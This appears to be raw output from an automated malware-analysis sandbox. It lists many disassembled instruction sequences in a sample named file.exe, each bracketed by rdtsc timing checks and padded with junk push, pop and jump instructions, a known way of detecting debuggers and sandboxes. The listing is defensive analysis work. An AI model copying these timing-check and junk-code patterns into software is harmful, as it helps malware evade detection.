Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3EEEC second address: D3EEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3EEFB second address: D3EEFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6812 second address: DB6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6818 second address: DB681C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB681C second address: DB683D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F70F070E5C6h 0x00000008 jmp 00007F70F070E5CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F70F070E5C8h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB6989 second address: DB69A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jno 00007F70F0BCDB06h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBDB4F second address: DBDB69 instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5CCh 0x00000008 js 00007F70F070E5C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jg 00007F70F070E5D4h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBDB69 second address: DBDB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC49CF second address: DC49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC3C9F second address: DC3CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4233 second address: DC4268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D9h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c jmp 00007F70F070E5D5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4423 second address: DC4429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4429 second address: DC4450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pushad 0x00000008 jl 00007F70F070E5C6h 0x0000000e jmp 00007F70F070E5CEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5302A second address: D53030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53030 second address: D5303D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F70F070E5C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5303D second address: D53057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F70F0BCDB0Ch 0x00000011 je 00007F70F0BCDB06h 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D53057 second address: D5305E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5305E second address: D53063 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC98E3 second address: DC98F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC98F8 second address: DC98FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC98FE second address: DC9904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9904 second address: DC9908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9BB5 second address: DC9BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9D31 second address: DC9D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F70F0BCDB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC9D3B second address: DC9D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA44C second address: DCA450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA450 second address: DCA458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA996 second address: DCA99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA99C second address: DCA9A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9A6 second address: DCA9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9B7 second address: DCA9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F70F070E5D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70F070E5D2h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9EB second address: DCA9EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCA9EF second address: DCAA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F70F070E5CEh 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAA1D second address: DCAA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70F0BCDB19h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAA3B second address: DCAA50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F70F070E5C6h 0x0000000a jo 00007F70F070E5C6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCAA50 second address: DCAA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D8AC second address: D8D8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D8C9 second address: D8D8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB18h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8D8E5 second address: D72A36 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12479AACh], esi 0x00000011 call dword ptr [ebp+122D35F9h] 0x00000017 pushad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DCD6 second address: D8DCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DCDC second address: D8DCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DE3C second address: D8DE85 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 add dword ptr [esp], 6F006A0Fh 0x0000000e mov dword ptr [ebp+12464D5Bh], esi 0x00000014 call 00007F70F0BCDB09h 0x00000019 jg 00007F70F0BCDB1Bh 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F70F0BCDB0Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E2A6 second address: D8E2B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F70F070E5C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E645 second address: D8E679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 jmp 00007F70F0BCDB0Ch 0x0000000d pop edi 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D2B2Dh] 0x00000015 push 0000001Eh 0x00000017 stc 0x00000018 sub dword ptr [ebp+122D38DAh], ecx 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jns 00007F70F0BCDB0Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E679 second address: D8E688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E9EC second address: D8E9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8E9F1 second address: D8EA05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCEE5D second address: DCEE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD65A8 second address: DD65DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D7h 0x00000009 jmp 00007F70F070E5D9h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48E8D second address: D48EA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F70F0BCDB06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48EA1 second address: D48EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F70F070E5CCh 0x00000012 pushad 0x00000013 jmp 00007F70F070E5D7h 0x00000018 jmp 00007F70F070E5CFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48EE9 second address: D48F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB11h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48F00 second address: D48F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD52DB second address: DD52E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5805 second address: DD5852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 je 00007F70F070E5C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 jl 00007F70F070E5D4h 0x00000017 jmp 00007F70F070E5CEh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F70F070E5D6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5852 second address: DD5891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F70F0BCDB19h 0x0000000e jmp 00007F70F0BCDB19h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5891 second address: DD5897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD4FEC second address: DD5005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F70F0BCDB06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5005 second address: DD500B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD500B second address: DD5031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB10h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F70F0BCDB10h 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5E19 second address: DD5E31 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F070E5CEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5F91 second address: DD5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD6255 second address: DD6275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 jns 00007F70F070E5C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDD828 second address: DDD82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDD82E second address: DDD847 instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70F070E5CBh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDD847 second address: DDD84B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDFD2A second address: DDFD55 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70F070E5C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F70F070E5D9h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE2D03 second address: DE2D0D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F70F0BCDB06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE2D0D second address: DE2D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE2D13 second address: DE2D1D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE2ECC second address: DE2ED6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6B52 second address: DE6B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6B5A second address: DE6B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6CCD second address: DE6CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6F70 second address: DE6F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6F78 second address: DE6F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6F7C second address: DE6F86 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F70F070E5C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6F86 second address: DE6F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DECDA4 second address: DECDAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DECDAB second address: DECDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F70F0BCDB18h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DED31A second address: DED322 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DED322 second address: DED32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F70F0BCDB06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DED32D second address: DED35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F70F070E5D4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DED35B second address: DED381 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jng 00007F70F0BCDB1Dh 0x00000013 jmp 00007F70F0BCDB11h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF25F3 second address: DF260D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F70F070E5C6h 0x0000000a jng 00007F70F070E5C6h 0x00000010 jng 00007F70F070E5C6h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF272D second address: DF273A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F70F0BCDB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF273A second address: DF2746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007F70F070E5C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF2B46 second address: DF2B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF2B4A second address: DF2B54 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70F070E5C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF2B54 second address: DF2BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ah 0x00000007 js 00007F70F0BCDB16h 0x0000000d jmp 00007F70F0BCDB10h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 ja 00007F70F0BCDB24h 0x0000001b jnc 00007F70F0BCDB06h 0x00000021 jmp 00007F70F0BCDB18h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF2BA3 second address: DF2BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF9D3B second address: DF9D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF9D3F second address: DF9D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F70F070E5D6h 0x0000000c jp 00007F70F070E5C6h 0x00000012 pop eax 0x00000013 ja 00007F70F070E5D2h 0x00000019 jns 00007F70F070E5C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA21D second address: DFA22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F70F0BCDB0Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA22F second address: DFA233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA808 second address: DFA815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFA815 second address: DFA843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jl 00007F70F070E5C6h 0x0000000e jmp 00007F70F070E5D9h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
